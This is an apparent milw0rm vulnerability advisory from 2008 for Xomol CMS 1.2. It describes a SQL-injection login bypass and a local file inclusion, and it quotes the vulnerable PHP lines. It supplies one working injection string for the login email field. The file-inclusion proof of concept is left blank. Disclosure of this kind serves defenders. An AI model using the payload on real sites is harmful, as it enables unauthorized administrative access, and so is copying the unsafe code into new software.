Xomol CMS 1.2 - Authentication Bypass / Local File Inclusion

Related Vulnerabilities: CVE-2008-2484   CVE-2008-2483  
Publish Date: 25 May 2008
Author: DNX
   |    Xomol CMS v1 Login Bypass & LFI   |
   |             coded by DNX             |
[!] Discovered.: DNX
[!] Vendor.....: http://www.xomol.net
[!] Detected...: 12.05.2008
[!] Reported...: 13.05.2008 (didn't work: host mail.xomol.net said: 554 5.7.1 - Relay access denied)
[!] Response...: xx.xx.2008

[!] Background.: Xomol CMS is a content management system based on PHP and MySQL

[!] Bug Bypass.: $_POST['email'] and $_POST['password'] in index.php near line 59

                 58: if(!empty($_POST['email'])&&!empty($_POST['password'])){
                 59:      $sql='SELECT user_id FROM users WHERE user_email="'.$_POST['email'].'"  AND  user_password="'.md5($_POST['password']).'" AND user_status=1';
                 60:      $result = sql_query($sql, $dbi);

[!] Bug LFI....: $op in index.php near line 272

                 234: switch($op){

                 270:     default:
                 271:     if (file_exists('modules/'.$op.'/index.php')) {
                 272:         include('modules/'.$op.'/index.php');

[!] PoC Bypass.: Login with email: " OR user_group=1/*"" and password: not empty
                 (works only with magic_quotes_gpc = off)

[!] PoC LFI....:

# milw0rm.com [2008-05-25]